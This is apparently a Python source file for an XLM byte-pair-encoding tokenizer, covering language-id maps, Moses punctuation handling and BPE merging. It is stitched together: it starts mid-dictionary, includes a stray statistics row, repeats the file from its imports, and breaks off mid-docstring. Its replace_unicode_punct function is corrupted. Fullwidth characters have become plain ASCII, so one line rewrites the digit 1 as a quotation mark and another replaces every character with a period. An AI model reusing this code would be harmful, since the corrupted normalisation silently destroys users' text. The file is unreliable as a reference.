"3": "el",
"4": "en",
"5": "es",
"6": "fr",
"7": "hi",
"8": "ru",
"9": "sw",
"10": "th",
"11": "tr",
"12": "ur",
"13": "vi",
"14": "zh"},
"lang2id": { "ar": 0,
"bg": 1,
"de": 2,
"el": 3,
"en": 4,
"es": 5,
"fr": 6,
"hi": 7,
"ru": 8,
"sw": 9,
"th": 10,
"tr": 11,
"ur": 12,
"vi": 13,
"zh": 14 }},
'xlm-mlm-xnli15-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "ar",
"1": "bg",
"2": "de",
"3": "el",
"4": "en",
"5": "es",
"6": "fr",
"7": "hi",
"8": "ru",
"9": "sw",
"10": "th",
"11": "tr",
"12": "ur",
"13": "vi",
"14": "zh"},
"lang2id": { "ar": 0,
"bg": 1,
"de": 2,
"el": 3,
"en": 4,
"es": 5,
"fr": 6,
"hi": 7,
"ru": 8,
"sw": 9,
"th": 10,
"tr": 11,
"ur": 12,
"vi": 13,
"zh": 14 }},
'xlm-clm-enfr-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "fr"},
"lang2id": { "en": 0,
"fr": 1 }},
'xlm-clm-ende-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "de",
"1": "en"},
"lang2id": { "de": 0,
"en": 1 }},
'xlm-mlm-17-1280': {"do_lowercase_and_remove_accent": False,
"id2lang": {
"0": "ar",
"1": "de",
"2": "en",
"3": "es",
"4": "fr",
"5": "hi",
"6": "it",
"7": "ja",
"8": "ko",
"9": "nl",
"10": "pl",
"11": "pt",
"12": "ru",
"13": "sv",
"14": "tr",
"15": "vi",
"16": "zh"
},
"lang2id": {
"ar": 0,
"de": 1,
"en": 2,
"es": 3,
"fr": 4,
"hi": 5,
"it": 6,
"ja": 7,
"ko": 8,
"nl": 9,
"pl": 10,
"pt": 11,
"ru": 12,
"sv": 13,
"tr": 14,
"vi": 15,
"zh": 16}},
'xlm-mlm-100-1280': {"do_lowercase_and_remove_accent": False,
"id2lang": {
"0": "af",
"1": "als",
"2": "am",
"3": "an",
"4": "ang",
"5": "ar",
"6": "arz",
"7": "ast",
"8": "az",
"9": "bar",
"10": "be",
"11": "bg",
"12": "bn",
"13": "br",
"14": "bs",
"15": "ca",
"16": "ceb",
"17": "ckb",
"18": "cs",
"19": "cy",
"20": "da",
"21": "de",
"22": "el",
"23": "en",
"24": "eo",
"25": "es",
"26": "et",
"27": "eu",
"28": "fa",
"29": "fi",
"30": "fr",
"31": "fy",
"32": "ga",
"33": "gan",
"34": "gl",
"35": "gu",
"36": "he",
"37": "hi",
"38": "hr",
"39": "hu",
"40": "hy",
"41": "ia",
"42": "id",
"43": "is",
"44": "it",
"45": "ja",
"46": "jv",
"47": "ka",
"48": "kk",
"49": "kn",
"50": "ko",
"51": "ku",
"52": "la",
"53": "lb",
"54": "lt",
"55": "lv",
"56": "mk",
"57": "ml",
"58": "mn",
"59": "mr",
"60": "ms",
"61": "my",
"62": "nds",
"63": "ne",
"64": "nl",
"65": "nn",
"66": "no",
"67": "oc",
"68": "pl",
"69": "pt",
"70": "ro",
"71": "ru",
"72": "scn",
"73": "sco",
"74": "sh",
"75": "si",
"76": "simple",
"77": "sk",
"78": "sl",
"79": "sq",
"80": "sr",
"81": "sv",
"82": "sw",
"83": "ta",
"84": "te",
"85": "th",
"86": "tl",
"87": "tr",
"88": "tt",
"89": "uk",
"90": "ur",
"91": "uz",
"92": "vi",
"93": "war",
"94": "wuu",
"95": "yi",
"96": "zh",
"97": "zh_classical",
"98": "zh_min_nan",
"99": "zh_yue"
},
"lang2id": {
"af": 0,
"als": 1,
"am": 2,
"an": 3,
"ang": 4,
"ar": 5,
"arz": 6,
"ast": 7,
"az": 8,
"bar": 9,
"be": 10,
"bg": 11,
"bn": 12,
"br": 13,
"bs": 14,
"ca": 15,
"ceb": 16,
"ckb": 17,
"cs": 18,
"cy": 19,
"da": 20,
"de": 21,
"el": 22,
"en": 23,
"eo": 24,
"es": 25,
"et": 26,
"eu": 27,
"fa": 28,
"fi": 29,
"fr": 30,
"fy": 31,
"ga": 32,
"gan": 33,
"gl": 34,
"gu": 35,
"he": 36,
"hi": 37,
"hr": 38,
"hu": 39,
"hy": 40,
"ia": 41,
"id": 42,
"is": 43,
"it": 44,
"ja": 45,
"jv": 46,
"ka": 47,
"kk": 48,
"kn": 49,
"ko": 50,
"ku": 51,
"la": 52,
"lb": 53,
"lt": 54,
"lv": 55,
"mk": 56,
"ml": 57,
"mn": 58,
"mr": 59,
"ms": 60,
"my": 61,
"nds": 62,
"ne": 63,
"nl": 64,
"nn": 65,
"no": 66,
"oc": 67,
"pl": 68,
"pt": 69,
"ro": 70,
"ru": 71,
"scn": 72,
"sco": 73,
"sh": 74,
"si": 75,
"simple": 76,
"sk": 77,
"sl": 78,
"sq": 79,
"sr": 80,
"sv": 81,
"sw": 82,
"ta": 83,
"te": 84,
"th": 85,
"tl": 86,
"tr": 87,
"tt": 88,
"uk": 89,
"ur": 90,
"uz": 91,
"vi": 92,
"war": 93,
"wuu": 94,
"yi": 95,
"zh": 96,
"zh_classical": 97,
"zh_min_nan": 98,
"zh_yue": 99
}},
}
def get_pairs(word):
    """
    Return set of symbol pairs in a word.

    word is represented as tuple of symbols (symbols being variable-length strings).

    Returns one (symbol, symbol) tuple per adjacent pair. For words with fewer
    than two symbols the result is the empty set (the previous implementation
    raised IndexError on an empty word).
    """
    # zip(word, word[1:]) yields every adjacent pair in order.
    return set(zip(word, word[1:]))
def lowercase_and_remove_accent(text):
    """
    Lowercase and strips accents from a piece of text based on
    https://github.com/facebookresearch/XLM/blob/master/tools/lowercase_and_remove_accent.py

    `text` is a list of tokens; a processed list of tokens is returned.
    """
    joined = ' '.join(text).lower()
    decomposed = unicodedata.normalize("NFD", joined)
    # Drop the combining marks (category Mn) produced by NFD decomposition.
    stripped = "".join(
        char for char in decomposed
        if unicodedata.category(char) != "Mn"
    )
    return stripped.lower().split(' ')
def replace_unicode_punct(text):
'''
Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/replace-unicode-punctuation.perl
'''
text = text.replace(',', ',')
text = re.sub(r'。\s*', '. ', text)
text = text.replace('、', ',')
text = text.replace('”', '"')
text = text.replace('“', '"')
text = text.replace('∶', ':')
text = text.replace(':', ':')
text = text.replace('?', '?')
text = text.replace('《', '"')
text = text.replace('》', '"')
text = text.replace(')', ')')
text = text.replace('!', '!')
text = text.replace('(', '(')
text = text.replace(';', ';')
text = text.replace('1', '"')
text = text.replace('」', '"')
text = text.replace('「', '"')
text = text.replace('0', '0')
text = text.replace('3', '3')
text = text.replace('2', '2')
text = text.replace('5', '5')
text = text.replace('6', '6')
text = text.replace('9', '9')
text = text.replace('7', '7')
text = text.replace('8', '8')
text = text.replace('4', '4')
text = re.sub(r'.\s*', '. ', text)
text = text.replace('~', '~')
text = text.replace('’', '\'')
text = text.replace('…', '...')
text = text.replace('━', '-')
text = text.replace('〈', '<')
text = text.replace('〉', '>')
text = text.replace('【', '[')
text = text.replace('】', ']')
text = text.replace('%', '%')
return text
def remove_non_printing_char(text):
    '''
    Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/remove-non-printing-char.perl
    '''
    # Unicode categories starting with 'C' (Cc, Cf, Cs, Co, Cn) are
    # control / format / surrogate / private-use / unassigned -- drop them.
    return "".join(
        char for char in text
        if not unicodedata.category(char).startswith('C')
    )
def romanian_preprocessing(text):
    '''Sennrich's WMT16 scripts for Romanian preprocessing, used by model `xlm-mlm-enro-1024`'''
    # The upstream scripts first normalise cedilla forms (S/T-cedilla ->
    # S/T-comma) and then strip all Romanian diacritics.  Composing those
    # sequential replaces gives one direct character-to-character table.
    table = str.maketrans({
        "\u015e": "S", "\u015f": "s",   # S/s-cedilla  (via S/s-comma)
        "\u0218": "S", "\u0219": "s",   # S/s-comma
        "\u0162": "T", "\u0163": "t",   # T/t-cedilla  (via T/t-comma)
        "\u021a": "T", "\u021b": "t",   # T/t-comma
        "\u0102": "A", "\u0103": "a",   # A/a-breve
        "\u00c2": "A", "\u00e2": "a",   # A/a-circumflex
        "\u00ce": "I", "\u00ee": "i",   # I/i-circumflex
    })
    return text.translate(table)
class XLMTokenizer(PreTrainedTokenizer):
    """
    BPE tokenizer for XLM

    - Moses preprocessing & tokenization for most supported languages
    - Language specific tokenization for Chinese (Jieba), Japanese (KyTea) and Thai (PyThaiNLP)
    - (optionally) lower case & normalize all inputs text
    - argument ``special_tokens`` and function ``set_special_tokens``, can be used to add additional symbols \
      (ex: "__classify__") to a vocabulary
    - `lang2id` attribute maps the languages supported by the model with their ids if provided (automatically set for pretrained vocabularies)
    - `id2lang` attributes does reverse mapping if provided (automatically set for pretrained vocabularies)
    - `do_lowercase_and_remove_accent` controls lower casing and accent removal (automatically set for pretrained vocabularies)
    """
    vocab_files_names = VOCAB_FILES_NAMES
    pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
    pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
    max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES

    def __init__(self, vocab_file, merges_file, unk_token="<unk>", bos_token="<s>",
                 sep_token="</s>", pad_token="<pad>", cls_token="</s>",
                 mask_token="<special1>", additional_special_tokens=["<special0>",
                 "<special1>", "<special2>", "<special3>", "<special4>", "<special5>",
                 "<special6>", "<special7>", "<special8>", "<special9>"],
                 lang2id=None, id2lang=None, do_lowercase_and_remove_accent=True,
                 **kwargs):
        """Load the JSON token->id vocabulary from `vocab_file` and the BPE
        merge table from `merges_file` (one merge per line; rank = line index)."""
        super(XLMTokenizer, self).__init__(unk_token=unk_token, bos_token=bos_token,
                                           sep_token=sep_token, pad_token=pad_token,
                                           cls_token=cls_token, mask_token=mask_token,
                                           additional_special_tokens=additional_special_tokens,
                                           **kwargs)
        # cache of sm.MosesPunctNormalizer instance, keyed by language code
        self.cache_moses_punct_normalizer = dict()
        # cache of sm.MosesTokenizer instance, keyed by language code
        self.cache_moses_tokenizer = dict()
        self.lang_with_custom_tokenizer = set(['zh', 'th', 'ja'])
        # True for current supported model (v1.2.0), False for XLM-17 & 100
        self.do_lowercase_and_remove_accent = do_lowercase_and_remove_accent
        self.lang2id = lang2id
        self.id2lang = id2lang
        if lang2id is not None and id2lang is not None:
            assert len(lang2id) == len(id2lang)

        # Lazily-created language-specific tokenizers (see ja_tokenize / _tokenize).
        self.ja_word_tokenizer = None
        self.zh_word_tokenizer = None

        # Context managers close the handles promptly; the previous version
        # left both files open.
        with open(vocab_file, encoding="utf-8") as vocab_handle:
            self.encoder = json.load(vocab_handle)
        self.decoder = {v: k for k, v in self.encoder.items()}
        with open(merges_file, encoding='utf-8') as merges_handle:
            merges = merges_handle.read().split('\n')[:-1]
        merges = [tuple(merge.split()[:2]) for merge in merges]
        self.bpe_ranks = dict(zip(merges, range(len(merges))))
        # BPE cache: raw token -> space-joined BPE string (see bpe()).
        self.cache = {}

    def moses_punct_norm(self, text, lang):
        """Moses punctuation normalization for `lang`, with one cached
        normalizer instance per language."""
        if lang not in self.cache_moses_punct_normalizer:
            punct_normalizer = sm.MosesPunctNormalizer(lang=lang)
            self.cache_moses_punct_normalizer[lang] = punct_normalizer
        else:
            punct_normalizer = self.cache_moses_punct_normalizer[lang]
        return punct_normalizer.normalize(text)

    def moses_tokenize(self, text, lang):
        """Moses word tokenization for `lang` (no escaping, returns a list),
        with one cached tokenizer instance per language."""
        if lang not in self.cache_moses_tokenizer:
            moses_tokenizer = sm.MosesTokenizer(lang=lang)
            self.cache_moses_tokenizer[lang] = moses_tokenizer
        else:
            moses_tokenizer = self.cache_moses_tokenizer[lang]
        return moses_tokenizer.tokenize(text, return_str=False, escape=False)

    def moses_pipeline(self, text, lang):
        """Moses pre-tokenization cleanup: unicode punctuation replacement,
        punctuation normalization, then removal of non-printing characters."""
        text = replace_unicode_punct(text)
        text = self.moses_punct_norm(text, lang)
        text = remove_non_printing_char(text)
        return text

    def ja_tokenize(self, text):
        """Japanese word segmentation via KyTea, instantiated on first use.
        Raises the original import error (with install instructions logged)
        when KyTea / Mykytea is not available."""
        if self.ja_word_tokenizer is None:
            try:
                import Mykytea
                self.ja_word_tokenizer = Mykytea.Mykytea('-model %s/local/share/kytea/model.bin' % os.path.expanduser('~'))
            except (AttributeError, ImportError) as e:
                logger.error("Make sure you install KyTea (https://github.com/neubig/kytea) and it's python wrapper (https://github.com/chezou/Mykytea-python) with the following steps")
                logger.error("1. git clone git@github.com:neubig/kytea.git && cd kytea")
                logger.error("2. autoreconf -i")
                logger.error("3. ./configure --prefix=$HOME/local")
                logger.error("4. make && make install")
                logger.error("5. pip install kytea")
                raise e
        return list(self.ja_word_tokenizer.getWS(text))

    @property
    def vocab_size(self):
        """Number of entries in the token->id vocabulary."""
        return len(self.encoder)

    def bpe(self, token):
        """Apply Byte-Pair Encoding to a single token.

        The token's last symbol is suffixed with '</w>' (end-of-word marker);
        the lowest-ranked adjacent pair is then merged repeatedly until no
        known merge remains. Returns the space-joined BPE symbols; results
        are memoized in self.cache.
        """
        word = tuple(token[:-1]) + (token[-1] + '</w>',)
        if token in self.cache:
            return self.cache[token]
        pairs = get_pairs(word)

        if not pairs:
            return token+'</w>'

        while True:
            bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float('inf')))
            if bigram not in self.bpe_ranks:
                break
            first, second = bigram
            new_word = []
            i = 0
            while i < len(word):
                try:
                    j = word.index(first, i)
                    new_word.extend(word[i:j])
                    i = j
                except ValueError:
                    # `first` no longer occurs -- flush the remainder and stop.
                    # (Was a bare `except:`, which also swallowed
                    # KeyboardInterrupt/SystemExit; tuple.index only raises
                    # ValueError here.)
                    new_word.extend(word[i:])
                    break
                if word[i] == first and i < len(word)-1 and word[i+1] == second:
                    new_word.append(first+second)
                    i += 2
                else:
                    new_word.append(word[i])
                    i += 1
            new_word = tuple(new_word)
            word = new_word
            if len(word) == 1:
                break
            else:
                pairs = get_pairs(word)
        word = ' '.join(word)
        # Special-case a token of "\n " (newline + space): its symbols are
        # ('\n', ' </w>'), so the join yields "\n  </w>" with TWO spaces.
        # The previous one-space comparison could never match.
        if word == '\n  </w>':
            word = '\n</w>'
        self.cache[token] = word
        return word

    def _tokenize(self, text, lang='en', bypass_tokenizer=False):
        """
        Tokenize a string given language code. For Chinese, Japanese and Thai, we use a language specific tokenizer. Otherwise, we use Moses.

        Details of tokenization:
        - [sacremoses](https://github.com/alvations/sacremoses): port of Moses
        - Install with `pip install sacremoses`
        - [pythainlp](https://github.com/PyThaiNLP/pythainlp): Thai tokenizer
        - Install with `pip install pythainlp`
        - [kytea](https://github.com/chezou/Mykytea-python): Japanese tokenizer, wrapper of [KyTea](https://github.com/neubig/kytea)
        - Install with the following steps:
        ```
        git clone git@github.com:neubig/kytea.git && cd kytea
        autoreconf -i
        ./configure --prefix=$HOME/local
        make && make install
        pip install kytea
        ```
        - [jieba](https://github.com/fxsjy/jieba): Chinese tokenizer *
        - Install with `pip install jieba`

        \* The original XLM used [Stanford Segmenter](https://nlp.stanford.edu/software/stanford-segmenter-2018-10-16.zip).
        However, the wrapper (`nltk.tokenize.stanford_segmenter`) is slow due to JVM overhead, and it will be deprecated.
        Jieba is a lot faster and pip-installable. Note there is some mismatch with the Stanford Segmenter. It should be fine
        if you fine-tune the model with Chinese supervision. If you want the same exact behaviour, use the original XLM
        [preprocessing script](https://github.com/facebookresearch/XLM/tree/master/tools) to tokenize the sentence externally,
        and set `bypass_tokenizer=True` to bypass the tokenizer.

        Args:
        - lang: ISO language code (default = 'en') (string). Languages should belong of the model supported languages. However, we don't enforce it.
        - bypass_tokenizer: Allow users to preprocess and tokenize the sentences externally (default = False) (bool). If True, we only apply BPE.

        Returns:
        List of tokens.
        """
        if lang and self.lang2id and lang not in self.lang2id:
            logger.error("Supplied language code not found in lang2id mapping. Please check that your language is supported by the loaded pretrained model.")
        if bypass_tokenizer:
            text = text.split()
        elif lang not in self.lang_with_custom_tokenizer:
            text = self.moses_pipeline(text, lang=lang)
            # TODO: make sure we are using `xlm-mlm-enro-1024`, since XLM-100 doesn't have this step
            if lang == 'ro':
                text = romanian_preprocessing(text)
            text = self.moses_tokenize(text, lang=lang)
        elif lang == 'th':
            text = self.moses_pipeline(text, lang=lang)
            try:
                if 'pythainlp' not in sys.modules:
                    from pythainlp.tokenize import word_tokenize as th_word_tokenize
                else:
                    th_word_tokenize = sys.modules['pythainlp'].word_tokenize
            except (AttributeError, ImportError) as e:
                logger.error("Make sure you install PyThaiNLP (https://github.com/PyThaiNLP/pythainlp) with the following steps")
                logger.error("1. pip install pythainlp")
                raise e
            text = th_word_tokenize(text)
        elif lang == 'zh':
            try:
                if 'jieba' not in sys.modules:
                    import jieba
                else:
                    jieba = sys.modules['jieba']
            except (AttributeError, ImportError) as e:
                logger.error("Make sure you install Jieba (https://github.com/fxsjy/jieba) with the following steps")
                logger.error("1. pip install jieba")
                raise e
            text = ' '.join(jieba.cut(text))
            text = self.moses_pipeline(text, lang=lang)
            text = text.split()
        elif lang == 'ja':
            text = self.moses_pipeline(text, lang=lang)
            text = self.ja_tokenize(text)
        else:
            raise ValueError('It should not reach here')

        if self.do_lowercase_and_remove_accent and not bypass_tokenizer:
            text = lowercase_and_remove_accent(text)

        split_tokens = []
        for token in text:
            if token:
                split_tokens.extend([t for t in self.bpe(token).split(' ')])

        return split_tokens

    def _convert_token_to_id(self, token):
        """ Converts a token (str/unicode) in an id using the vocab. """
        return self.encoder.get(token, self.encoder.get(self.unk_token))

    def _convert_id_to_token(self, index):
        """Converts an index (integer) in a token (string/unicode) using the vocab."""
        return self.decoder.get(index, self.unk_token)

    def convert_tokens_to_string(self, tokens):
        """ Converts a sequence of tokens (string) in a single string. """
        out_string = ''.join(tokens).replace('</w>', ' ').strip()
        return out_string

    def add_special_tokens_single_sentence(self, token_ids):
        """
        Adds special tokens to a sequence for sequence classification tasks.
        An XLM sequence has the following format: [CLS] X [SEP]
        """
        return [self.cls_token_id] + token_ids + [self.sep_token_id]

    def add_special_tokens_sentences_pair(self, token_ids_0, token_ids_1):
        """
        Adds special tokens to a sequence pair for sequence classification tasks.
        An XLM sequence pair has the following format: [CLS] A [SEP] B [SEP]
        """
        sep = [self.sep_token_id]
        cls = [self.cls_token_id]
        return cls + token_ids_0 + sep + token_ids_1 + sep

    def save_vocabulary(self, save_directory):
        """Save the tokenizer vocabulary and merge files to a directory."""
        if not os.path.isdir(save_directory):
            logger.error("Vocabulary path ({}) should be a directory".format(save_directory))
            return
        vocab_file = os.path.join(save_directory, VOCAB_FILES_NAMES['vocab_file'])
        merge_file = os.path.join(save_directory, VOCAB_FILES_NAMES['merges_file'])

        with open(vocab_file, 'w', encoding='utf-8') as f:
            f.write(json.dumps(self.encoder, ensure_ascii=False))

        index = 0
        with open(merge_file, "w", encoding="utf-8") as writer:
            # Emit merges ordered by rank; warn if ranks are not contiguous.
            for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
                if index != token_index:
                    logger.warning("Saving vocabulary to {}: BPE merge indices are not consecutive."
                                   " Please check that the tokenizer is not corrupted!".format(merge_file))
                    index = token_index
                writer.write(' '.join(bpe_tokens) + u'\n')
                index += 1
        return vocab_file, merge_file
| 44.142138 | 185 | 0.413558 |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import logging
import os
import re
import sys
import unicodedata
from io import open
import sacremoses as sm
from .tokenization_utils import PreTrainedTokenizer
from .tokenization_bert import BasicTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {
'vocab_file': 'vocab.json',
'merges_file': 'merges.txt',
}
PRETRAINED_VOCAB_FILES_MAP = {
'vocab_file':
{
'xlm-mlm-en-2048': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-en-2048-vocab.json",
'xlm-mlm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-vocab.json",
'xlm-mlm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-vocab.json",
'xlm-mlm-enro-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enro-1024-vocab.json",
'xlm-mlm-tlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-tlm-xnli15-1024-vocab.json",
'xlm-mlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-xnli15-1024-vocab.json",
'xlm-clm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-enfr-1024-vocab.json",
'xlm-clm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-ende-1024-vocab.json",
'xlm-mlm-17-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-17-1280-vocab.json",
'xlm-mlm-100-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-100-1280-vocab.json",
},
'merges_file':
{
'xlm-mlm-en-2048': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-en-2048-merges.txt",
'xlm-mlm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-merges.txt",
'xlm-mlm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-merges.txt",
'xlm-mlm-enro-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enro-1024-merges.txt",
'xlm-mlm-tlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-tlm-xnli15-1024-merges.txt",
'xlm-mlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-xnli15-1024-merges.txt",
'xlm-clm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-merges.txt",
'xlm-clm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-merges.txt",
'xlm-mlm-17-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-17-1280-merges.txt",
'xlm-mlm-100-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-100-1280-merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
'xlm-mlm-en-2048': 512,
'xlm-mlm-ende-1024': 512,
'xlm-mlm-enfr-1024': 512,
'xlm-mlm-enro-1024': 512,
'xlm-mlm-tlm-xnli15-1024': 512,
'xlm-mlm-xnli15-1024': 512,
'xlm-clm-enfr-1024': 512,
'xlm-clm-ende-1024': 512,
'xlm-mlm-17-1280': 512,
'xlm-mlm-100-1280': 512,
}
PRETRAINED_INIT_CONFIGURATION = {
'xlm-mlm-en-2048': {"do_lowercase_and_remove_accent": True},
'xlm-mlm-ende-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "de",
"1": "en"},
"lang2id": { "de": 0,
"en": 1 }},
'xlm-mlm-enfr-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "fr"},
"lang2id": { "en": 0,
"fr": 1 }},
'xlm-mlm-enro-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "ro"},
"lang2id": { "en": 0,
"ro": 1 }},
'xlm-mlm-tlm-xnli15-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "ar",
"1": "bg",
"2": "de",
"3": "el",
"4": "en",
"5": "es",
"6": "fr",
"7": "hi",
"8": "ru",
"9": "sw",
"10": "th",
"11": "tr",
"12": "ur",
"13": "vi",
"14": "zh"},
"lang2id": { "ar": 0,
"bg": 1,
"de": 2,
"el": 3,
"en": 4,
"es": 5,
"fr": 6,
"hi": 7,
"ru": 8,
"sw": 9,
"th": 10,
"tr": 11,
"ur": 12,
"vi": 13,
"zh": 14 }},
'xlm-mlm-xnli15-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "ar",
"1": "bg",
"2": "de",
"3": "el",
"4": "en",
"5": "es",
"6": "fr",
"7": "hi",
"8": "ru",
"9": "sw",
"10": "th",
"11": "tr",
"12": "ur",
"13": "vi",
"14": "zh"},
"lang2id": { "ar": 0,
"bg": 1,
"de": 2,
"el": 3,
"en": 4,
"es": 5,
"fr": 6,
"hi": 7,
"ru": 8,
"sw": 9,
"th": 10,
"tr": 11,
"ur": 12,
"vi": 13,
"zh": 14 }},
'xlm-clm-enfr-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "fr"},
"lang2id": { "en": 0,
"fr": 1 }},
'xlm-clm-ende-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "de",
"1": "en"},
"lang2id": { "de": 0,
"en": 1 }},
'xlm-mlm-17-1280': {"do_lowercase_and_remove_accent": False,
"id2lang": {
"0": "ar",
"1": "de",
"2": "en",
"3": "es",
"4": "fr",
"5": "hi",
"6": "it",
"7": "ja",
"8": "ko",
"9": "nl",
"10": "pl",
"11": "pt",
"12": "ru",
"13": "sv",
"14": "tr",
"15": "vi",
"16": "zh"
},
"lang2id": {
"ar": 0,
"de": 1,
"en": 2,
"es": 3,
"fr": 4,
"hi": 5,
"it": 6,
"ja": 7,
"ko": 8,
"nl": 9,
"pl": 10,
"pt": 11,
"ru": 12,
"sv": 13,
"tr": 14,
"vi": 15,
"zh": 16}},
'xlm-mlm-100-1280': {"do_lowercase_and_remove_accent": False,
"id2lang": {
"0": "af",
"1": "als",
"2": "am",
"3": "an",
"4": "ang",
"5": "ar",
"6": "arz",
"7": "ast",
"8": "az",
"9": "bar",
"10": "be",
"11": "bg",
"12": "bn",
"13": "br",
"14": "bs",
"15": "ca",
"16": "ceb",
"17": "ckb",
"18": "cs",
"19": "cy",
"20": "da",
"21": "de",
"22": "el",
"23": "en",
"24": "eo",
"25": "es",
"26": "et",
"27": "eu",
"28": "fa",
"29": "fi",
"30": "fr",
"31": "fy",
"32": "ga",
"33": "gan",
"34": "gl",
"35": "gu",
"36": "he",
"37": "hi",
"38": "hr",
"39": "hu",
"40": "hy",
"41": "ia",
"42": "id",
"43": "is",
"44": "it",
"45": "ja",
"46": "jv",
"47": "ka",
"48": "kk",
"49": "kn",
"50": "ko",
"51": "ku",
"52": "la",
"53": "lb",
"54": "lt",
"55": "lv",
"56": "mk",
"57": "ml",
"58": "mn",
"59": "mr",
"60": "ms",
"61": "my",
"62": "nds",
"63": "ne",
"64": "nl",
"65": "nn",
"66": "no",
"67": "oc",
"68": "pl",
"69": "pt",
"70": "ro",
"71": "ru",
"72": "scn",
"73": "sco",
"74": "sh",
"75": "si",
"76": "simple",
"77": "sk",
"78": "sl",
"79": "sq",
"80": "sr",
"81": "sv",
"82": "sw",
"83": "ta",
"84": "te",
"85": "th",
"86": "tl",
"87": "tr",
"88": "tt",
"89": "uk",
"90": "ur",
"91": "uz",
"92": "vi",
"93": "war",
"94": "wuu",
"95": "yi",
"96": "zh",
"97": "zh_classical",
"98": "zh_min_nan",
"99": "zh_yue"
},
"lang2id": {
"af": 0,
"als": 1,
"am": 2,
"an": 3,
"ang": 4,
"ar": 5,
"arz": 6,
"ast": 7,
"az": 8,
"bar": 9,
"be": 10,
"bg": 11,
"bn": 12,
"br": 13,
"bs": 14,
"ca": 15,
"ceb": 16,
"ckb": 17,
"cs": 18,
"cy": 19,
"da": 20,
"de": 21,
"el": 22,
"en": 23,
"eo": 24,
"es": 25,
"et": 26,
"eu": 27,
"fa": 28,
"fi": 29,
"fr": 30,
"fy": 31,
"ga": 32,
"gan": 33,
"gl": 34,
"gu": 35,
"he": 36,
"hi": 37,
"hr": 38,
"hu": 39,
"hy": 40,
"ia": 41,
"id": 42,
"is": 43,
"it": 44,
"ja": 45,
"jv": 46,
"ka": 47,
"kk": 48,
"kn": 49,
"ko": 50,
"ku": 51,
"la": 52,
"lb": 53,
"lt": 54,
"lv": 55,
"mk": 56,
"ml": 57,
"mn": 58,
"mr": 59,
"ms": 60,
"my": 61,
"nds": 62,
"ne": 63,
"nl": 64,
"nn": 65,
"no": 66,
"oc": 67,
"pl": 68,
"pt": 69,
"ro": 70,
"ru": 71,
"scn": 72,
"sco": 73,
"sh": 74,
"si": 75,
"simple": 76,
"sk": 77,
"sl": 78,
"sq": 79,
"sr": 80,
"sv": 81,
"sw": 82,
"ta": 83,
"te": 84,
"th": 85,
"tl": 86,
"tr": 87,
"tt": 88,
"uk": 89,
"ur": 90,
"uz": 91,
"vi": 92,
"war": 93,
"wuu": 94,
"yi": 95,
"zh": 96,
"zh_classical": 97,
"zh_min_nan": 98,
"zh_yue": 99
}},
}
def get_pairs(word):
    """Return the set of all adjacent symbol pairs (bigrams) in *word*.

    *word* is a sequence of symbols, where each symbol is a variable-length
    string (as produced during BPE merging).
    """
    previous = word[0]
    bigrams = set()
    for symbol in word[1:]:
        bigrams.add((previous, symbol))
        previous = symbol
    return bigrams
def lowercase_and_remove_accent(text):
    """Lowercase *text* (a list of words) and strip combining accent marks.

    The words are space-joined, NFD-decomposed so accents become separate
    combining characters (category 'Mn'), those are dropped, and the result
    is split back into a list of words.
    """
    joined = ' '.join(text).lower()
    decomposed = unicodedata.normalize("NFD", joined)
    kept = [ch for ch in decomposed if unicodedata.category(ch) != "Mn"]
    return "".join(kept).lower().split(' ')
def replace_unicode_punct(text):
    """Replace CJK/fullwidth punctuation with its ASCII equivalent.

    Port of the Moses ``replace-unicode-punctuation.perl`` tokenizer script.

    Bug fix: the previous source had been mangled by a lossy character
    conversion — the fullwidth characters on the left-hand side of each
    replacement were collapsed to plain ASCII.  That made most replacements
    no-ops, made one of them corrupt the ordinary digit '1' into '"', and
